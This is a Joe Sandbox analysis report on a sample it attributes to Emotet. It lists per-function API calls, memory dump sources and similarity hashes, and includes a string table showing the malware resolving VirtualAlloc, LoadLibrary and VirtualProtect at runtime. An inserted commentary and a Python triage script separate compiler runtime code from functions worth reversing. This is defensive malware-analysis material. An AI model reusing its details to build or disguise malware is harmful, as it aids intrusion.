                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B73A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                    • String ID:
                                                                    • API String ID: 1310268301-0
                                                                    • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                    • Instruction ID: c2705001ea33ae3b14178d50083321177491f156f4f6e4ca9ede606577407618
                                                                    • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                    • Instruction Fuzzy Hash: 35219C11B0A74250EB24EF21F46F1BAB291BB45BC0F4459B5EA2D9B796DE3CE08D8300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                    • String ID:
                                                                    • API String ID: 1310268301-0
                                                                    • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                    • Instruction ID: 0a14e4d5c13a2af4851687da1d2da75f2523d93167d4b9adfce9c745fa466dea
                                                                    • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                    • Instruction Fuzzy Hash: FC218311B0AB8264EF24EF11B56F2B9B251AB457C0F4845B5ED6D87B95DE3CE449C300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$__initmbctable
                                                                    • String ID: @Ce
                                                                    • API String ID: 2804101511-1767366083
                                                                    • Opcode ID: 62b67f3d166044e4c3a65fa2a8f4440ca774743433b5403a5dc793ed1f544cce
                                                                    • Instruction ID: bb4a00107f7effc4060bdc03b57bc34ef665264bb9862552ced21198c10c4512
                                                                    • Opcode Fuzzy Hash: 62b67f3d166044e4c3a65fa2a8f4440ca774743433b5403a5dc793ed1f544cce
                                                                    • Instruction Fuzzy Hash: 42317221E0CB5295FB60DF21F86E37A6790AF45BC4F4845B5DA6C86A9ADF3CE04C8300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF8CA9B3359,?,?,00000028,00007FF8CA9B6C7D,?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19), ref: 00007FF8CA9B331F
                                                                    • GetProcAddress.KERNEL32(?,?,000000FF,00007FF8CA9B3359,?,?,00000028,00007FF8CA9B6C7D,?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19), ref: 00007FF8CA9B3334
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 1646373207-1276376045
                                                                    • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                    • Instruction ID: 0b5b394ec9b521a7eab3f4baba05d43146a8aaa85e1588b51c4d68dccacb53b5
                                                                    • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                    • Instruction Fuzzy Hash: 43E0EC50F19B0251EF19AF50B8AA23512906F58BD4B8864B9C87F863A1EE6CA69CC211
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
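Every record in this stretch of the listing is the statically linked MSVC CRT rather than Emotet's own code: _getptd's FlsGetValue/FlsSetValue/GetCurrentThreadId dance, EncodePointer/DecodePointer around the atexit tables, the GetModuleHandleW/GetProcAddress lookup of CorExitProcess in mscoree.dll that the CRT exit path performs, and the RtlCaptureContext / IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter / TerminateProcess sequence under 00007FF8CA9B6550, which matches the CRT's fault-reporting routine. The "IsDebuggerPresent" and "dynamically determine API calls" signatures in the overview therefore say more about the toolchain than about the malware. The script below is an added example, not Joe Sandbox code: it parses the record layout shown in this listing (APIs, Similarity and Uniqueness blocks), tags each function as CRT noise or worth reversing, keeps a watch list so anti-analysis calls are never silently dropped, and collapses functions that share an API String ID. CRT_HELPERS and WATCH are analyst heuristics, not report fields; the sample input is constructed from four records above plus one hypothetical CreateProcessW record to show a non-CRT hit.

```python
# Added example, not Joe Sandbox code: parse the per-function records shown in
# this listing and separate MSVC CRT helpers from functions worth reversing.
import re
from dataclasses import dataclass, field

# Analyst heuristic, not a report field: calls the statically linked MSVC CRT
# makes on its own (startup, FLS per-thread data, heap, atexit, fault reporting).
CRT_HELPERS = {
    "free", "realloc", "_errno", "_getptd", "_lock", "Sleep", "FlsGetValue",
    "FlsSetValue", "EncodePointer", "DecodePointer", "GetModuleHandleW",
    "GetProcAddress", "RtlCaptureContext", "IsDebuggerPresent", "GetCurrentProcess",
    "SetUnhandledExceptionFilter", "UnhandledExceptionFilter", "TerminateProcess",
}
# Reported even when the rest of the function looks like CRT code.
WATCH = {"IsDebuggerPresent", "GetProcAddress", "TerminateProcess"}

API_RE = re.compile(r"^\s*•\s*(?P<sub>Part of subcall function \w+:\s*)?"
                    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
           "Similarity", "Uniqueness"}

@dataclass
class FuncRecord:
    direct: list = field(default_factory=list)    # APIs the function calls
    indirect: list = field(default_factory=list)  # APIs reached via subcalls
    fields: dict = field(default_factory=dict)    # Similarity block

    def calls(self):
        return set(self.direct) | set(self.indirect)

    def classify(self):
        if not self.calls():
            return "no-api"
        return "crt" if self.calls() <= CRT_HELPERS else "review"

def parse_records(text):
    """One FuncRecord per listing entry; a 'Uniqueness Score' line ends one."""
    records, cur, section = [], FuncRecord(), None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("Uniqueness Score:"):
            records.append(cur)
            cur, section = FuncRecord(), None
        elif stripped in HEADERS:
            section = stripped
        elif section == "APIs" and (m := API_RE.match(line)):
            (cur.indirect if m.group("sub") else cur.direct).append(m.group("name"))
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur.fields[m.group("key")] = m.group("val").strip()
    return records

def triage(text):
    """One row per function, plus API String IDs shared by several functions."""
    rows, seen = [], {}
    for r in parse_records(text):
        sid = r.fields.get("API String ID", "")
        seen[sid] = seen.get(sid, 0) + 1
        rows.append({"api_string_id": sid, "class": r.classify(),
                     "watch": sorted(r.calls() & WATCH),
                     "string_id": r.fields.get("String ID", "")})
    return rows, {k: n for k, n in seen.items() if n > 1}

# Constructed input: four records shortened from the listing above plus one
# hypothetical record (CreateProcessW) to show a non-CRT hit.
SAMPLE = """\
APIs
• DecodePointer.KERNEL32 ref: 00007FF8CA9B72FD
• EncodePointer.KERNEL32 ref: 00007FF8CA9B7389
  • Part of subcall function 00007FF8CA9B318C: realloc.LIBCMT ref: 00007FF8CA9B31B7
Similarity
• API String ID: 1310268301-0
Uniqueness Score: -1.00%
Similarity
• API String ID: 1310268301-0
Uniqueness Score: -1.00%
APIs
• GetModuleHandleW.KERNEL32 ref: 00007FF8CA9B331F
• GetProcAddress.KERNEL32 ref: 00007FF8CA9B3334
Similarity
• String ID: CorExitProcess$mscoree.dll
• API String ID: 1646373207-1276376045
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00007FF8CA9B6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CA9B662D
  • Part of subcall function 00007FF8CA9B6550: TerminateProcess.KERNEL32 ref: 00007FF8CA9B6666
• free.LIBCMT ref: 00007FF8CA9B58A5
Similarity
• API String ID: (not shown in the listing)
Uniqueness Score: -1.00%
APIs
• CreateProcessW.KERNEL32 ref: (hypothetical)
Similarity
• API String ID: (hypothetical)
Uniqueness Score: -1.00%
"""
```

Calling triage(SAMPLE) returns one row per record: the EncodePointer/DecodePointer and mscoree.dll records come back as "crt", the empty record as "no-api", the hypothetical CreateProcessW record as "review", and the two records sharing API String ID 1310268301-0 are reported as a duplicate group, which is the same collapse an analyst would apply to the repeated 1310268301-0 entries above. The IsDebuggerPresent record also lands in "crt", but its watch list still names IsDebuggerPresent and TerminateProcess, so the call is visible to the reviewer as toolchain evidence rather than being discarded or mistaken for an author-written anti-debug check. To run it on a real report, paste the function listing into the text argument in place of SAMPLE.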

                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B309C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    • free.LIBCMT ref: 00007FF8CA9B58A5
                                                                    • free.LIBCMT ref: 00007FF8CA9B58C1
                                                                      • Part of subcall function 00007FF8CA9B6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CA9B658F
                                                                      • Part of subcall function 00007FF8CA9B6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CA9B662D
                                                                      • Part of subcall function 00007FF8CA9B6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6637
                                                                      • Part of subcall function 00007FF8CA9B6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6642
                                                                      • Part of subcall function 00007FF8CA9B6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CA9B6658
                                                                      • Part of subcall function 00007FF8CA9B6550: TerminateProcess.KERNEL32 ref: 00007FF8CA9B6666
                                                                    • free.LIBCMT ref: 00007FF8CA9B58D6
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    • free.LIBCMT ref: 00007FF8CA9B58F5
                                                                    • free.LIBCMT ref: 00007FF8CA9B5911
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                    • String ID:
                                                                    • API String ID: 2294642566-0
                                                                    • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                    • Instruction ID: a68abbcc407416e8ffa94f847a612090fed8797fe12f9611518262b99e97d7e8
                                                                    • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                    • Instruction Fuzzy Hash: 19519336A04B8582EB20DF1AF86A16E2395FB84BD8F484075DE5E87794DE3CD94AC340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _getptd
                                                                    • String ID:
                                                                    • API String ID: 3186804695-0
                                                                    • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                    • Instruction ID: 7580e35202da13dac799201fff07d7036e4f70617af039750143aeca17fb971d
                                                                    • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                    • Instruction Fuzzy Hash: 6D819F72A0978296DB24DF25F1997AA73A0FB88784F504135DB6E87B94DF3CE458CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$DecodePointer_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 4201827665-0
                                                                    • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                    • Instruction ID: 44423682b168f45c7f39a9bf0c7878036c9b13d083776c56db5ffff7b0162051
                                                                    • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                    • Instruction Fuzzy Hash: FE517E31A09B9286FB64EF25B86A7BA2291FF447C4F1040B5DA6EC7791DE7CF4488700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointercalloc
                                                                    • String ID:
                                                                    • API String ID: 1531210114-0
                                                                    • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                    • Instruction ID: 16dc616159ff06c0bd2f0b8c8c39da6bede9d8a1d6f02c63b3d296dd09449c09
                                                                    • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                    • Instruction Fuzzy Hash: FC218362B0974245FB289F65B43A3BA6291AF44BC4F488174DF5E87786EF3CE8188700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B53B2
                                                                    • free.LIBCMT ref: 00007FF8CA9B53D7
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B53F2
                                                                    • free.LIBCMT ref: 00007FF8CA9B5438
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 3188102813-0
                                                                    • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                    • Instruction ID: 910b5c6c8dc4b2558d66f1aa0a526ae1a2e5d261d83a5d24e5f568a1406d5c71
                                                                    • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                    • Instruction Fuzzy Hash: 70115E21A4A70285FF74AFB5F47B3B822919F80B84F4451B5D73FC62D5DE6CA8498321
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection$Freefree
                                                                    • String ID:
                                                                    • API String ID: 1250194111-0
                                                                    • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                    • Instruction ID: 29f3072bf3f1805a2760f9f19480944e964f1258f1ac6d66fcc4f8a7e2cb7777
                                                                    • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                    • Instruction Fuzzy Hash: F3119D32E08B4286FB249F05F86A2B87760FB00BD4F5885B0DB7D82695CF3CE5999701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$Sleep_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 2111406555-0
                                                                    • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                    • Instruction ID: 70f6688b16753841dbf9ef5e939629408e09a26fa710f064e0cbd57322ecffed
                                                                    • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                    • Instruction Fuzzy Hash: 49015E21A0974286FB646F75F4677AD6261EF84BC4F448074D72E973C6CE3CA8588351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_getptd
                                                                    • String ID: #
                                                                    • API String ID: 3432092939-1885708031
                                                                    • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                    • Instruction ID: b61db7e427d1f74fa0e23deecf3338e05fdc086b75afb70a3daa0fc0bea9a8d4
                                                                    • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                    • Instruction Fuzzy Hash: AF51B222A0CB8585E7308F18F4656BE7BA0F782BC0F584171DAAD97785CE3DD849CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                    • Instruction ID: 3589e40553d75f7a47c4da01a8e872e433a2a474ad1153a335f7f8a34fe03342
                                                                    • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                    • Instruction Fuzzy Hash: 1D51A232A1878186EB709F56B46A2B977A0BB85BC4F544575EBAD87781CF3CE44AC300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:11
                                                                    Total number of Limit Nodes:0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.356213727.0000017092630000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017092630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_17092630000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: 66badca975bebd088dcd6db3c4152a0989d08f54ae6781e3743bb8504e9a580b
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: E372AD30619B488BDB69DF18C8857E9B7F0FB98304F10562DE98EC3652DB34D946CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
